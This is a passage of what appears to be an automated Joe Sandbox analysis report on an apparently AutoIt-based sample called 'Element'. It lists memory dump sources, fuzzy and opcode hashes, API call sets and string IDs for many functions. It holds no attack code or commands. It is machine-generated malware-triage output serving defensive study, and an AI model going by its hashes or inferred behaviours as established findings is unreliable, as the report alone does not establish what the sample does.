                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$Show$Enable
                    • String ID:
                    • API String ID: 2939132127-0
                    • Opcode ID: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                    • Instruction ID: caa2a2d641f86ff94a664c0d81afa30330e87b70e76692d7cd0c3353fd3a6c0c
                    • Opcode Fuzzy Hash: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                    • Instruction Fuzzy Hash: 675160769097C681EBA18F15DC9C27837A4EB84F56F2840B2CA8D87762CF7DE845C750
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                    • Instruction ID: 81ceb2a150270fa7d1998acaa9f20c3fc6f169c4b7716db194511f40877b7a81
                    • Opcode Fuzzy Hash: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                    • Instruction Fuzzy Hash: 1F316B71A197A18AE7919F01AD8433A77A0FB84F92F040175EACAC6662CF7DEC45CB40
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2067211477-0
                    • Opcode ID: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                    • Instruction ID: b8ddb1c283aa11f989f611a00b399193504e2aca71a7360cd2cb405940a48dc9
                    • Opcode Fuzzy Hash: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                    • Instruction Fuzzy Hash: B3216A65A0A79286EE14DF61AC541B9A3A0AF84F92F484431DECD87BD6DF3CEC14C640
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID:
                    • API String ID: 1156100317-0
                    • Opcode ID: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                    • Instruction ID: 17315d192a06c6b0de5de1b4481ac69b5b8433befdbf80eb97cf70abfba27fb7
                    • Opcode Fuzzy Hash: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                    • Instruction Fuzzy Hash: 9111062EE0EA2381F7641928EC533B911416F42B73F094730EAEEC65DADE1CAC818121
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                    • String ID:
                    • API String ID: 2117695475-0
                    • Opcode ID: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                    • Instruction ID: c572318ff072f0d0c98d3ce907bbfcef3f381900bf8555d650fc2b09cd62d397
                    • Opcode Fuzzy Hash: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                    • Instruction Fuzzy Hash: DE11B090E0F16742FA157FB15C162B83285AF50B16F440470E9CDCA5E3ED1CBC404A22
                    APIs
                    • FlsGetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D564CB
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D564EA
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D56512
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D56523
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D56534
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value
                    • String ID:
                    • API String ID: 3702945584-0
                    • Opcode ID: 4eb7a9fb67454c873ea44887961028f86af825d7f718b6569672a22f17b9037e
                    • Instruction ID: 8482272c5db250ff2ae202a977ea8c32d435f9498b1c6e2b35ca0de515ca3100
                    • Opcode Fuzzy Hash: 4eb7a9fb67454c873ea44887961028f86af825d7f718b6569672a22f17b9037e
                    • Instruction Fuzzy Hash: 741182B830425062FA68A735657D3EA25C19B747F4F444B25AC3A077DAEE38C4D3C201
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                    • Instruction ID: d7d7959f3efc99614182a0048e34697e057922554f600ae43eb07ce36da5ee23
                    • Opcode Fuzzy Hash: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                    • Instruction Fuzzy Hash: FD01D425A1EA4281EB05CF30EC981399331EF95F82F544239E18FD55A6DF6CEC898A00
                    APIs
                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F0774
                    • TerminateThread.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F077F
                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F078D
                    • ~SyncLockT.VCCORLIB ref: 00007FF6C58F0796
                      • Part of subcall function 00007FF6C58EFF10: CloseHandle.KERNEL32(?,?,?,00007FF6C58F079B,?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58EFF21
                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F07A2
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                    • String ID:
                    • API String ID: 3142591903-0
                    • Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                    • Instruction ID: 71663df67f9016b33ad05693fa52e203d0f13f90054c0bc42c40e9b89d70a935
                    • Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                    • Instruction Fuzzy Hash: 00010C36A08A9586E7509F15E84422DB370FB88B52F544131DB8E87B56CF3CD896C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                    • Instruction ID: d2336c5d35246aacaf0a8f78d694cf137299d08571e437a3c56183f8f3ef590d
                    • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                    • Instruction Fuzzy Hash: 7C015261D186D685F6964F11BE883352761AF04F97F184570D4DAC9263DF7EEC48C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ErrorExitLastThread
                    • String ID:
                    • API String ID: 1611280651-0
                    • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                    • Instruction ID: 500c609e217e32f642b3bc9dfc7ac36ff983c42696bcbb537a557a9f80893dd7
                    • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                    • Instruction Fuzzy Hash: 9D011221B09B9292FA146F209D9813C2265FF40F76F545735D6BE866D6DF3CEC588300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                    • API String ID: 3215553584-1196891531
                    • Opcode ID: 7479535b235ddef64746d009f46135dcfb09b8f8046763b9b472e8af934b228b
                    • Instruction ID: f81aa94b521abc35b076fd7cf9da6a96c1cd4dcd7cc75645434f12df04a80d8e
                    • Opcode Fuzzy Hash: 7479535b235ddef64746d009f46135dcfb09b8f8046763b9b472e8af934b228b
                    • Instruction Fuzzy Hash: FE81A2F1684240A9FB754E2CC67C3F96BE2A33A7A8F755415EE06476D6C239C8C39701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                    • API String ID: 3215553584-1196891531
                    • Opcode ID: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                    • Instruction ID: fae339a16db2fba27c593150e879e2069ffc5ae6df2544df44021c4373aaf645
                    • Opcode Fuzzy Hash: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                    • Instruction Fuzzy Hash: ED81C372E0A262C6FB69AF259E4027937A4AF11F46F148035CA8EC76D1EF2DEC51D305
                    APIs
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C5874082
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C5874090
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740A0
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740B0
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740BE
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740CC
                      • Part of subcall function 00007FF6C58740DC: RegisterWindowMessageW.USER32(?,?,?,00007FF6C5874F68), ref: 00007FF6C5874146
                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C587106D), ref: 00007FF6C5875042
                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C587106D), ref: 00007FF6C58750C8
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C587106D), ref: 00007FF6C58BB336
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: AutoIt
                    • API String ID: 1986988660-2515660138
                    • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                    • Instruction ID: a756a878d158124cb0f50f3e0a778127c01a276b5c638c842337294f048de62c
                    • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                    • Instruction Fuzzy Hash: A5C1C2B1D19B8285E680DF15EDD407877A8FF94B82F5402BAD4CDC2662DFBCA958C780
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: $*
                    • API String ID: 3215553584-3982473090
                    • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                    • Instruction ID: 3dc3b6271e4eb8d5e85852a614ac2ac7a4cb2c0375181ab098be17d7bef7a205
                    • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                    • Instruction Fuzzy Hash: B361987292E2628AE7689F74885537C77A1EB45F4BF141235CADAC61D9CF2CDC81C701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID: !$acos
                    • API String ID: 1156100317-2870037509
                    • Opcode ID: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                    • Instruction ID: 3ad86b0e2e1b9b98166b88090549ed6c78c34231935437361af2e6c86807c3ec
                    • Opcode Fuzzy Hash: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                    • Instruction Fuzzy Hash: 7761FB21D2CF9588E623CF355C103769754AFB6BD2F118336E99EF5AA5DF2CE4828600
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID: !$asin
                    • API String ID: 1156100317-2188059690
                    • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                    • Instruction ID: 59e0ea7c531c61ad2f2f6cbeab5a0a9575628679cc8383f4f5ce8d5c67f99d46
                    • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                    • Instruction Fuzzy Hash: 6D61B922D2CFD585E253CF755C113769358AFA67D2F108332E99EF5AA9DF2CE4828600
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 2775327233-1405518554
                    • Opcode ID: 1336b63d4d684dbac4033a15bfb0a4e14f679ec9357e9498134274dee5581141
                    • Instruction ID: bcfe1bc6e7316c77cbd42343ce7f05bacce7a64cf0677bc09fc2611af0ec560d
                    • Opcode Fuzzy Hash: 1336b63d4d684dbac4033a15bfb0a4e14f679ec9357e9498134274dee5581141
                    • Instruction Fuzzy Hash: B3414A36B02B40E9FB14DF70D4F83EC33A4EBA4748F040525AE4967A59EB34C9A6D314
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem
                    • String ID: P
                    • API String ID: 135850232-3110715001
                    • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                    • Instruction ID: ba67e8ecadd7a9ec394189e0bb00e98c46dab0c0da8047e0024cbcfefb8440f0
                    • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                    • Instruction Fuzzy Hash: 1C41B036B056A281E720DF15C8093AD67A4EB86FA1F5A8231EAED877C1DF7CD845C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ByteCharErrorFileLastMultiWideWrite
                    • String ID: U
                    • API String ID: 2456169464-4171548499
                    • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                    • Instruction ID: b365f21ad7f1a05f29f016c8c25a3f873c03ee0e7bdde1a6255f4e8807bc97d0
                    • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                    • Instruction Fuzzy Hash: AF41B122B1979182DB608F25EC443AA77A0FB98B95F844431EE8DC7788DF7CD845C750
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
